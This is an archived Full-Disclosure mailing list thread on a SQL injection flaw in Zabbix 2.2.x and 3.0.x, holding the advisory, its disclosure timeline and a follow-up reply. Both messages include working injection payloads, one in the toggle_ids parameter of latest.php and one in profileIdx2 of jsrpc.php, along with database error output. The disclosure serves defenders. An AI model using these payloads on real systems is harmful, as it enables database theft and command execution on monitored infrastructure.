lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-Id: <20160813033117.14589C0296@smtp.hushmail.com>
Date: Fri, 12 Aug 2016 20:31:16 -0700
From: 1n3@...hmail.com
To: "Brandon Perry" <bperry.volatile@...il.com>
Cc: fulldisclosure@...lists.org
Subject: Re: [FD] Zabbix 2.2.x, 3.0.x SQL Injection Vulnerability

Which version of Zabbix? 3.0.3? 

-1N3

On 8/12/2016 at 7:22 PM, "Brandon Perry" <bperry.volatile@...il.com> wrote:
>
>I actually ended up finding this vuln in a different vector (in 
>the profileIdx2 parameter).
>
>/zabbix/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get&tim
>estamp=1471054088083&mode=2&screenid=&groupid=&hostid=0&pageFile=hi
>story.php&profileIdx=web.item.graph&profileIdx2=2’3297&updateProfil
>e=true&screenitemid=&period=3600&stime=20170813040734&resourcetype=
>17&itemids%5B23297%5D=23297&action=showlatest&filter=&filter_task=&
>mark_color=1
>
>
><div class="flickerfreescreen" data-timestamp="1471054088083" 
>id="flickerfreescreen_1"><table class="list-table" 
>id="t57ae81946b8cb"><thead><tr><th class="cell-
>width">Timestamp</th><th>Value</th></tr></thead><tbody><tr 
>class="nothing-to-show"><td colspan="2">No data 
>found.</td></tr></tbody></table></div><div class="msg-bad"><div 
>class="msg-details"><ul><li>Error in query [INSERT INTO profiles 
>(profileid, userid, idx, value_int, type, idx2) VALUES (39, 1, 
>'web.item.graph.period', '3600', 2, 2'3297)] [You have an error in 
>your SQL syntax; check the manual that corresponds to your MySQL 
>server version for the right syntax to use near ''3297)' at line 
>1]</li><li>Error in query [INSERT INTO profiles (profileid, 
>userid, idx, value_str, type, idx2) VALUES (40, 1, 
>'web.item.graph.stime', '20160813041028', 3, 2'3297)] [You have an 
>error in your SQL syntax; check the manual that corresponds to 
>your MySQL server version for the right syntax to use near 
>''3297)' at line 1]</li><li>Error in query [INSERT INTO profiles 
>(profileid, userid, idx, value_int, type, idx2) VALUES (41, 1, 
>'web.item.graph.isnow', '1', 2, 2'3297)] [You have an error in 
>your SQL syntax; check the manual that corresponds to your MySQL 
>server version for the right syntax to use near ''3297)' at line 
>1]</li></ul></div><span class="overlay-close-btn" 
>onclick="javascript: $(this).closest('.msg-bad').remove();" 
>title="Close"></span></div>
>
>
>Similarly, it requires auth unless you enable Guest.
>
>
>> On Aug 11, 2016, at 7:23 PM, 1n3@...hmail.com wrote:
>> 
>> =========================================
>> Title: Zabbix 3.0.3 SQL Injection Vulnerability
>> Product: Zabbix
>> Vulnerable Version(s): 2.2.x, 3.0.x
>> Fixed Version: 3.0.4
>> Homepage: http://www.zabbix.com
>> Patch link: https://support.zabbix.com/browse/ZBX-11023
>> Credit: 1N3@...wdShield
>> ==========================================
>> 
>> 
>> Vendor Description:
>> =====================
>> Zabbix is an open source availability and performance monitoring 
>solution.
>> 
>> 
>> Vulnerability Overview:
>> =====================
>> Zabbix 2.2.x, 3.0.x and trunk suffers from a remote SQL 
>injection vulnerability due to a failure to sanitize input in the 
>toggle_ids array in the latest.php page.
>> 
>> 
>> Business Impact:
>> =====================
>> By exploiting this SQL injection vulnerability, an authenticated 
>attacker (or guest user) is able to gain full access to the 
>database. This would allow an attacker to escalate their 
>privileges to a power user, compromise the database, or execute 
>commands on the underlying database operating system.
>> 
>> Because of the functionalities Zabbix offers, an attacker with 
>admin privileges (depending on the configuration) can execute 
>arbitrary OS commands on the configured Zabbix hosts and server. 
>This results in a severe impact to the monitored infrastructure.
>> 
>> Although the attacker needs to be authenticated in general, the 
>system could also be at risk if the adversary has no user account. 
>Zabbix offers a guest mode which provides a low privileged default 
>account for users without password. If this guest mode is enabled, 
>the SQL injection vulnerability can be exploited unauthenticated.
>> 
>> 
>> Proof of Concept:
>> =====================
>> 
>> 
>latest.php?output=ajax&sid=&favobj=toggle&toggle_open_state=1&toggl
>e_ids[]=15385); select * from users where (1=1
>> 
>> Result:
>> SQL (0.000361): INSERT INTO profiles (profileid, userid, idx, 
>value_int, type, idx2) VALUES (88, 1, 'web.latest.toggle', '1', 2, 
>15385); select * from users where (1=1)
>> latest.php:746 → require_once() → CProfile::flush() → 
>CProfile::insertDB() → DBexecute() in /home/sasha/zabbix-
>svn/branches/2.2/frontends/php/include/profiles.inc.php:185
>> 
>> 
>> Disclosure Timeline:
>> =====================
>> 
>> 7/18/2016 - Reported vulnerability to Zabbix
>> 7/21/2016 - Zabbix responded with permission to file CVE and to 
>disclose after a patch is made public
>> 7/22/2016 - Zabbix released patch for vulnerability
>> 8/3/2016 - CVE details submitted
>> 8/11/2016 - Vulnerability details disclosed
>> 
>> 
>> _______________________________________________
>> Sent through the Full Disclosure mailing list
>> https://nmap.org/mailman/listinfo/fulldisclosure
>> Web Archives & RSS: http://seclists.org/fulldisclosure/


_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ